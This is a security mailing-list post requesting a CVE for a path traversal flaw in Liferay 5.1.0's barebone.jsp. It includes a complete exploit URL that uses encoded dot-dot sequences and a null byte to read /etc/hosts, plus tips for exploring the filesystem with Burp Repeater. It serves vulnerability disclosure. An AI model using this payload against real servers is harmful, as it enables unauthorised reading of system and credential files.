CVE:Request - Path Traversal Barebone.jsp - Liferay 5.1.0

["petrella.pietro" <petrella.pietro () gmail com>]

I discovered a /directory traversal issue /on *minifierBundleDir 
*/barebone.jsp /_variable___on a website with *Liferay 5.1.0*. I don't 
exclude that this vulnerability is present in other Liferay versions as 
well.

However, i report the following vulnerable URL of example:

https://mysite.it/html/js/barebone.jsp?browserId=firefox&themeId=sometheme&colorSchemeId=01&minifierType=js&minifierBundleId=javascript.barebone.files&*minifierBundleDir**=**/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E%2Fetc%2Fhosts%00.html*&t=1429132297000

It's important to note that the url requested is built in the following 
manner:
- only .. "encoded characters" are permitted when you insert the 
traversal request
- At the end of the file is necessary insert *%00* and *.html* otherwise 
the request is not accepted

So, to navigate filesystem is recommended to use Burp Suite "repeater 
tab" tool.

If there are no CVE about this finding, at this pourpose i require a CVE 
please.

Thank you
Pietro

-- -- -- -- --
Pietro Petrella
Information Security Consultant
(CISSP, OPST, RHCE, ISO 27001:2013)
PGP: 5017 E6A8 9E1E 5B39 8C52 05C7 81A5 C3C9 8ED5 4730